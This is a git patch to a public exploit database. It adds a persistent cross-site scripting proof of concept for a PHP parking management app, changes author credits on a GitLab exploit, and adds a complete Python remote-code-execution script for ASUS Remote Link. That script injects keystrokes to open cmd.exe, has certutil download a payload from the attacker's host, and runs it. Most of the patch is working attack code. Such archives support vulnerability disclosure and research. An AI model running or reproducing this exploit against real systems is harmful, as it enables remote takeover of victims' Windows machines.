From 0ec0dacc0ec8dcd2ce526d7c9a8affd3c2063124 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 26 Feb 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-02-26 3 changes to exploits/shellcodes ASUS Remote Link 1.1.2.13 - Remote Code Execution Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS) --- exploits/php/webapps/49595.txt | 38 ++++++++ exploits/ruby/webapps/49334.py | 3 +- exploits/windows/remote/49594.py | 162 +++++++++++++++++++++++++++++++ files_exploits.csv | 2 + 4 files changed, 204 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/49595.txt create mode 100755 exploits/windows/remote/49594.py diff --git a/exploits/php/webapps/49595.txt b/exploits/php/webapps/49595.txt new file mode 100644 index 000000000..c9721eb31 --- /dev/null +++ b/exploits/php/webapps/49595.txt @@ -0,0 +1,38 @@ +# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS) +# Date: 2021-02-25 +# Exploit Author: Tushar Vaidya +# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip +# Version: v1.0 +# Tested on: Ubuntu + + +*Steps to Reproduce:* +1) Login with Admin Credentials and click on the '*Manage category*' button. +2) Click on the '*Add Categories*' button. +3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite. +4) Now add the following payload input field of *Category *as a parameter name is *catename* + +Payload: ba1man"> + +4) Click On Save +5) Now go to '*Manage category > View Categories*' +5) XSS payload is triggered. + +*proof-of-concept:* +1) Request: + +POST /lagos_parker/parker/addcategory.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/lagos_parker/parker/addcategory.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 82 +Connection: close +Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn +Upgrade-Insecure-Requests: 1 +catename=ba1man">&submit= \ No newline at end of file diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py index f0e29ed1b..31345e155 100755 --- a/exploits/ruby/webapps/49334.py +++ b/exploits/ruby/webapps/49334.py @@ -1,7 +1,8 @@ # Exploit Title: GitLab 11.4.7 RCE (POC) # Date: 24th December 2020 # Exploit Author: Norbert Hofmann -# Original Exploit Authors: Sam Redmond, Tam Lai Yin +# Exploit Modifications: Sam Redmond, Tam Lai Yin +# Original Author: Mohin Paramasivam # Software Link: https://gitlab.com/ # Environment: GitLab 11.4.7, community edition # CVE: CVE-2018-19571 + CVE-2018-19585 diff --git a/exploits/windows/remote/49594.py b/exploits/windows/remote/49594.py new file mode 100755 index 000000000..9f3ee4999 --- /dev/null +++ b/exploits/windows/remote/49594.py @@ -0,0 +1,162 @@ +# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution +# Date: 24-02-2021 +# Exploit Author: H4rk3nz0 +# Vendor Homepage: http://asus.com/ +# Software Link: http://remotelink.asus.com/ +# Version: 1.1.2.13 +# Tested on: Windows 10 Enterprise Build 17763 +# CVE: N/A + +#!/usr/bin/python + +import socket +from time import sleep +import sys + + +port = 5665 +target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +prefix = "04020b02" +suffix = "0000020000000000000000000300000000000000000004000000000000000000010000" +enter = (prefix + ("0" * 1038)).decode("hex") +string_prefix = "04020b0200000000010000" +string_suffix = "0" * 1022 +pre_command = "04000b0200000000".decode("hex") +user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender' + +# ASCII to Hex Character List +characters={ + "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", + "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", + "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", + "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", + "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", + " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", + ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", + "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", + "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} + + +# User Specified arguments +try: + rhost = "192.168.1.93" + lhost = sys.argv[2] + payload = sys.argv[3] +except: + print("Usage: python " + sys.argv[0] + " ") + exit() + +# HandShake Packets to Smart Gesture Server +def Handshake(): + target.connect((rhost,port)) + target.sendto("b2".decode("hex"),(rhost,port)) + target.sendto("38323538".decode("hex"),(rhost,port)) + target.sendto("03000f0000000000".decode("hex"),(rhost,port)) + target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port)) + target.sendto("02008a0000000000".decode("hex"),(rhost,port)) + target.sendto(user_declare,(rhost,port)) + sleep(0.1) + + +def MoveMouse(): + for i in range(0,16): + target.sendto("0000330038040006".decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port)) + target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port)) + sleep(0.6) + +# Sends Left Click Input (Occasional Delay for some Reason) +def LeftClick(): + target.sendto("0000330038040006".decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) + target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port)) + sleep(4) + +# Send Enter/Return Key Input +def SendReturn(): + target.sendto(pre_command,(rhost,port)) + sleep(0.2) + target.sendto(enter,(rhost,port)) # Enter/Return Key + +# Send String Characters +def SendString(string): + for char in string: + convert = characters[char] + final_string = string_prefix + convert + string_suffix + target.sendto(pre_command,(rhost,port)) + target.sendto(final_string.decode("hex"),(rhost,port)) + sleep(0.2) + +# Main Execution +def main(): + print("[+] Saying Hello") + Handshake() + sleep(2) + print("[+] Moving Mouse") + MoveMouse() + print("[+] Left Clicking (takes a few seconds)") + LeftClick() # Left Click is delayed sometimes + print("[+] Opening CMD") + SendString("cmd.exe") # Start Command Prompt + sleep(0.5) + SendReturn() + sleep(1) + print("[+] Retrieving Payload") + SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload + sleep(0.5) + SendReturn() + sleep(3) + print("[+] Executing") + SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload + sleep(0.5) + SendReturn() + sleep(0.5) + print("[+] Done! Check your listener?") + SendReturn() # Trailing Enter Command Ensures full execution + target.close() + exit() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4564adff9..decfe5cee 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18388,6 +18388,7 @@ id,file,description,date,author,type,platform,port 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows, 49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris, 49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple, +49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43782,3 +43783,4 @@ id,file,description,date,author,type,platform,port 49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php, 49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php, 49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php, +49595,exploits/php/webapps/49595.txt,"Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)",2021-02-25,"Tushar Vaidya",webapps,php,